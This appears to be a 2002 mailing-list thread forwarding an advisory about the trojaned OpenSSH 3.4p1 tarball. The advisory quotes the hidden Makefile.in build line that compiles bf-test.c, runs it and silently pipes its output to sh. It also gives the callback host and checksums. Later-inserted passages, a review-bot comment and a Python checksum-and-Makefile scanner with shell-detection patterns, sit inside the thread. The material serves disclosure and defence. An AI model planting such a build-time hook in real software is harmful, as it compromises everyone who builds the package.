
openssh-3.4p1.tar.gz distribution recently trojaned

  • Godwin Stewart
    Message 1 of 5 , Aug 1, 2002
      X-POSTED to:

      BeginningWithLinux@yahoogroups.com
      linux@yahoogroups.com
      LINUX_Newbies@yahoogroups.com
      Linux-Anyway@...



      From
      http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

      ----- Forwarded message from Edwin Groothuis <edwin@...> -----

      Date: Thu, 1 Aug 2002 16:55:51 +1000
      From: Edwin Groothuis <edwin@...>
      To: incidents@...
      Subject: openssh-3.4p1.tar.gz trojaned

      Greetings,

      Just want to inform you that the OpenSSH package on ftp.openbsd.org
      (and probably all its mirrors now) is trojaned:

      ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

      The OpenBSD people have been informed about it (via email to
      deraadt@... and via irc.openprojects.org/#openbsd)


      The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
      all: libopenbsd-compat.a
      + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
      ../bf-test.out &
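      Review bot: the recipe line added under `all:` executes code at build time, which a compat-library Makefile has no reason to do. It compiles bf-test.c, runs the result, and hands the generated bf-test.out to sh in the background, and the leading @ keeps make from echoing any of it. Reject the change: the `all` target should only depend on libopenbsd-compat.a, and any test program belongs in its own named target that is not run by default and does not pipe generated output into a shell.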

      bf-test.c[1] is nothing more than a wrapper which generates a
      shell-script[2] which compiles itself and tries to connect to a
      server running on 203.62.158.32:6667 (web.snsonline.net).

      [1] http://www.mavetju.org/~edwin/bf-test.c
      [2] http://www.mavetju.org/~edwin/bf-output.sh

      This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
      ports system:
      MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

      This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
      MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

      --
      Seen in the classified ads:
      NICE PARACHUTE: NEVER OPENED - USED ONCE
      ____________________________________________
      | G. Stewart -- gstewart@... |
      | gstewart@... |
      |--------------------------------------------|
      | Linux User Group de Touraine |
      | http://www.lug-touraine.org |
      ____________________________________________
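As an added example (not part of the original post and not OpenSSH code), the check the advisory implies can be scripted: compare a tarball's MD5 against the two values quoted above, and flag Makefile.in recipe lines that execute code at build time. The heuristic patterns and the sample Makefile fragment are constructed for illustration.

```python
import hashlib
import re

# MD5 values quoted in the advisory above.
KNOWN_MD5 = {
    "459c1d0262e939d6432f193c7a4ba8a8": "clean (FreeBSD ports copy)",
    "3ac9bc346d736b4a51d676faa2a08a57": "trojaned",
}

def md5_of(path, chunk=1 << 16):
    """Hash a file in chunks so a large tarball is never held in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def classify(digest):
    """Map a digest to the advisory's verdict; anything else is unverified."""
    return KNOWN_MD5.get(digest.strip().lower(), "unknown")

# Heuristic patterns (assumptions of this example, tuned to the reported line).
PATTERNS = [
    ("runs a program from the build dir", re.compile(r"(^|[;&|]\s*)@?\s*\./[\w.-]+")),
    ("feeds a file to a shell", re.compile(r"(^|[;&|]\s*)(ba)?sh\s+[^-\s]\S*")),
    ("backgrounds the command", re.compile(r"(?<!&)&\s*$")),
]

def scan_recipes(makefile_text):
    """Return [(line_number, [reasons])] for recipe lines matching a heuristic."""
    findings = []
    for n, line in enumerate(makefile_text.splitlines(), 1):
        if not line.startswith("\t"):  # this scan covers tab-indented recipes only
            continue
        reasons = [why for why, rx in PATTERNS if rx.search(line.strip())]
        if reasons:
            findings.append((n, reasons))
    return findings

# Constructed Makefile.in fragment: line 2 is the recipe reported in the post,
# the archive rule below it is an ordinary, benign stand-in.
SAMPLE = (
    "all: libopenbsd-compat.a\n"
    "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ../bf-test.out &\n"
    "\n"
    "libopenbsd-compat.a: $(OBJS)\n"
    "\t$(AR) rv $@ $(OBJS)\n"
    "\t$(RANLIB) $@\n"
)

if __name__ == "__main__":
    for lineno, reasons in scan_recipes(SAMPLE):
        print(f"Makefile.in:{lineno}: " + "; ".join(reasons))
```

A digest that classifies as "unknown" means the file matches neither published value and should be treated as unverified rather than as clean.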
    • Mohsin Khan
      Message 2 of 5 , Aug 1, 2002
        I thought that Linux had no viruses?


      • Horror Vacui
        Message 3 of 5 , Aug 1, 2002
          Mohsin Khan wrote:

          >I thought that Linux had no viruses?
          >

          Yes, you thought so and have all the right in the world to continue
          doing it. A trojan is not a virus. Viruses are snippets of programming
          code that can perform tasks like deleting or infecting files, formatting
          disks, sending mail, perhaps most importantly spread themselves... A
          trojan is just malicious code in a program that gathers information
          it's programmed to gather, and sends it to somebody. It's a way for
          crackers to sneak into your system and get access to information they
          can't get from the outside. This one appears to be quite serious,
          because you often use ssh as root - therefore the trojan can access and
          betray any information root has access to, and that means quite anything.

          Nobody ever said that Open Source is impossible to crack. People will
          always try, and some will succeed. The difference between Open Source
          and proprietary software though, the significant difference that makes
          Open Source more secure, is the way such things are handled. Right at
          the moment, any piece of Open Source software you're using is being
          hacked by hundreds of friendly geeks trying to make it better for you,
          and if some unfriendly geek puts something into it to damage you, the
          friendly ones are very likely to notice right away, and being friendly,
          they invariably yell "FIRE" the moment they smell the smoke even if
          they're ashamed because of it. Proprietary software is controlled by
          far fewer people, some of them on starving wages, much less enthusiastic
          and much less likely to find a vulnerability. When they do, the company
          they work for is very unlikely to say "We've sold you malicious code,
          have a patch right away" - it's bad for the business. Hence the
          institution of Microsoft Service Packs, mending the worse failings and
          covering up others without you being informed explicitly what it does
          (naming the flaw). They sell it off as a service to make customers'
          software better, instead of admitting they made a mistake and are just
          correcting it.

          My thanks to friendly geeks for the software, and for having the
          greatness to admit it when they mess up. Never mind, shit happens.


          Cheers
          Horror Vacui

        • Andres Rosado
          Message 4 of 5 , Aug 2, 2002
            At 03:08 PM 8/1/2002 +0100, you wrote:
            >I thought that Linux had no viruses?

            Linux has viruses, but they usually don't propagate as fast as most
            Windows viruses.


            -----------------------------------
            Andres Rosado
            Email: andresr@...
            ICQ: 66750646
            Homepage: http://andres980.tripod.com/

            The more we disagree, the more chance there is that at least one of us
            is right.
          • Godwin Stewart
            Message 5 of 5 , Aug 3, 2002
              On Fri, 02 Aug 2002 20:11:19 -0400, Andres Rosado <arosado@...>
              wrote to LINUX_Newbies@yahoogroups.com:

              > Linux has viruses, but they usually don't propagate as fast as most
              > Windows viruses.

              You obviously didn't read a reply sent to this list a couple of days ago:

              Yes, you thought so [that there were no Linux viruses] and have all the
              right in the world to continue doing it. A trojan is not a virus. Viruses
              are snippets of programming code that can perform tasks like deleting or
              infecting files, formatting disks, sending mail, perhaps most importantly
              spread themselves... A trojan is just malicious code in a program that
              gathers information it's programmed to gather, and sends it to somebody.
              It's a way for crackers to sneak into your system and get access to
              information they can't get from the outside. This one appears to be quite
              serious, because you often use ssh as root - therefore the trojan can access
              and betray any information root has access to, and that means quite
              anything.

              Nobody ever said that Open Source is impossible to crack. People will
              always try, and some will succeed. The difference between Open Source
              and proprietary software though, the significant difference that makes
              Open Source more secure, is the way such things are handled. Right at
              the moment, any piece of Open Source software you're using is being
              hacked by hundreds of friendly geeks trying to make it better for you,
              and if some unfriendly geek puts something into it to damage you, the
              friendly ones are very likely to notice right away, and being friendly,
              they invariably yell "FIRE" the moment they smell the smoke even if
              they're ashamed because of it. Proprietary software is controlled by
              far fewer people, some of them on starving wages, much less enthusiastic
              and much less likely to find a vulnerability. When they do, the company
              they work for is very unlikely to say "We've sold you malicious code,
              have a patch right away" - it's bad for the business. Hence the
              institution of Microsoft Service Packs, mending the worse failings and
              covering up others without you being informed explicitly what it does
              (naming the flaw). They sell it off as a service to make customers'
              software better, instead of admitting they made a mistake and are just
              correcting it.

              My thanks to friendly geeks for the software, and for having the
              greatness to admit it when they mess up. Never mind, shit happens.

              Signed: Horror Vacui

              --
              In the 60's people took acid to make the world weird.
              Now the world is weird and people take Prozac to make
              it normal.
              ____________________________________________
              | G. Stewart -- gstewart@... |
              | gstewart@... |
              |--------------------------------------------|
              | Linux User Group de Touraine |
              | http://www.lug-touraine.org |
              ____________________________________________